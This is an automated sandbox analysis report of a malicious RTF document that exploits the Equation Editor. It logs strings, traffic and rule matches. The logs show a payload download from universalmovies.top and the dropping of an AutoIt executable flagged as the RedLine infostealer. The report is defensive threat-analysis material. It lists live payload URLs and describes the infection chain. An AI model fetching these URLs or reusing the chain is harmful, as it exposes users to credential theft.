                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                  Source: RegSvcs.exe, RegSvcs.exe, 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                  Source: RegSvcs.exeString found in binary or memory: https://api.ipify.
                  Source: RegSvcs.exeString found in binary or memory: https://api.ipify.orgcoo
                  Source: RegSvcs.exe, RegSvcs.exe, 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, RegSvcs.exe, 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.000000000249D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.LR
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.0000000002131000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.000000000249D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashLR
                  Source: EQNEDT32.EXE, 00000009.00000003.391282505.000000000057D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.000000000057E000.00000004.00000020.00020000.00000000.sdmp, universalmovies.top.url.0.drString found in binary or memory: https://universalmovies.top/
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.391505550.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/ExtExport2.exe
                  Source: EQNEDT32.EXE, 00000009.00000002.391505550.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/ExtExport2.exeF
                  Source: EQNEDT32.EXE, 00000009.00000002.391505550.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/ExtExport2.exej
                  Source: EQNEDT32.EXE, 00000009.00000002.391505550.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/ExtExport2.exeooC:
                  Source: EQNEDT32.EXE, 00000009.00000003.391282505.000000000057D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.000000000057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/FB8Rj
                  Source: notorious.doc.url.0.drString found in binary or memory: https://universalmovies.top/notorious.doc
                  Source: tmpED81.tmp.12.drString found in binary or memory: https://www.google.com/favicon.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49166 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49173 version: TLS 1.2
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002A425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,10_2_002A425A
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002A4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_002A4458
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002A425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,10_2_002A425A
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00290219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_00290219
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_002BCDAC

                  System Summary

                  barindex
                  Source: 10.2.notorious53209.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 10.2.notorious53209.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 10.2.notorious53209.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 10.2.notorious53209.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 12.2.RegSvcs.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: notorious53209.exe PID: 3468, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 3536, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\notorious[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9B70A7F.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: This is a third-party compiled AutoIt script.10_2_00233B4C
                  Source: notorious53209.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: notorious53209.exe, 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bc9cf93b-9
                  Source: notorious53209.exe, 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c019bc57-4
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\notorious.doc.urlJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\universalmovies.top.urlJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\notorious53209.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\ExtExport2[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00233633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,10_2_00233633
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BC220 NtdllDialogWndProc_W,10_2_002BC220
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BC27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,10_2_002BC27C
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,10_2_002BC49C
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,10_2_002BC788
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BC86D SendMessageW,NtdllDialogWndProc_W,10_2_002BC86D
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,10_2_002BC8EE
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BCB7F NtdllDialogWndProc_W,10_2_002BCB7F
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BCB50 NtdllDialogWndProc_W,10_2_002BCB50
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BCBAE NtdllDialogWndProc_W,10_2_002BCBAE
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BCBF9 NtdllDialogWndProc_W,10_2_002BCBF9
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BCC2E ClientToScreen,NtdllDialogWndProc_W,10_2_002BCC2E
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BCD6C GetWindowLongW,NtdllDialogWndProc_W,10_2_002BCD6C
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_002BCDAC
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00231287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,73666F36,NtdllDialogWndProc_W,10_2_00231287
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00231290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,10_2_00231290
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0023167D NtdllDialogWndProc_W,10_2_0023167D
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002316B5 NtdllDialogWndProc_W,10_2_002316B5
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BD6C6 NtdllDialogWndProc_W,10_2_002BD6C6
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002316DE GetParent,NtdllDialogWndProc_W,10_2_002316DE
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,10_2_002BD74C
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0023189B NtdllDialogWndProc_W,10_2_0023189B
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BDA9A NtdllDialogWndProc_W,10_2_002BDA9A
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002BBF4D NtdllDialogWndProc_W,CallWindowProcW,10_2_002BBF4D
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00294021: CreateFileW,DeviceIoControl,CloseHandle,10_2_00294021
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00288858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,756C1AAC,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,10_2_00288858
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_0029545F
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0023E80010_2_0023E800
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002533C710_2_002533C7
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0025DBB510_2_0025DBB5
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0023E06010_2_0023E060
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002B804A10_2_002B804A
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0024414010_2_00244140
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0025240510_2_00252405
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0026652210_2_00266522
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002B066510_2_002B0665
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0026267E10_2_0026267E
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0025283A10_2_0025283A
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0024684310_2_00246843
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002689DF10_2_002689DF
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00248A0E10_2_00248A0E
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00266A9410_2_00266A94
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002B0AE210_2_002B0AE2
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0028EB0710_2_0028EB07
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00298B1310_2_00298B13
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0025CD6110_2_0025CD61
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0026700610_2_00267006
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0024710E10_2_0024710E
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0024319010_2_00243190
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0023128710_2_00231287
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0025F41910_2_0025F419
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0024568010_2_00245680
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002516C410_2_002516C4
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002458C010_2_002458C0
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002578D310_2_002578D3
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00251BB810_2_00251BB8
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00269D0510_2_00269D05
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0023FE4010_2_0023FE40
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0025BFE610_2_0025BFE6
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00251FD010_2_00251FD0
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0016360010_2_00163600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026713512_2_00267135
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026D24012_2_0026D240
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026771012_2_00267710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026FAD812_2_0026FAD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00269D8812_2_00269D88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026AD9C12_2_0026AD9C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026321912_2_00263219
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_002632D012_2_002632D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026A31612_2_0026A316
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026770A12_2_0026770A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026895012_2_00268950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0026C9C812_2_0026C9C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00269D6112_2_00269D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00269E6112_2_00269E61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01E42EF812_2_01E42EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01E4262812_2_01E42628
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01E422E012_2_01E422E0
                  Source: ~WRF{CD326501-1350-4080-AA2C-AD93E1795262}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
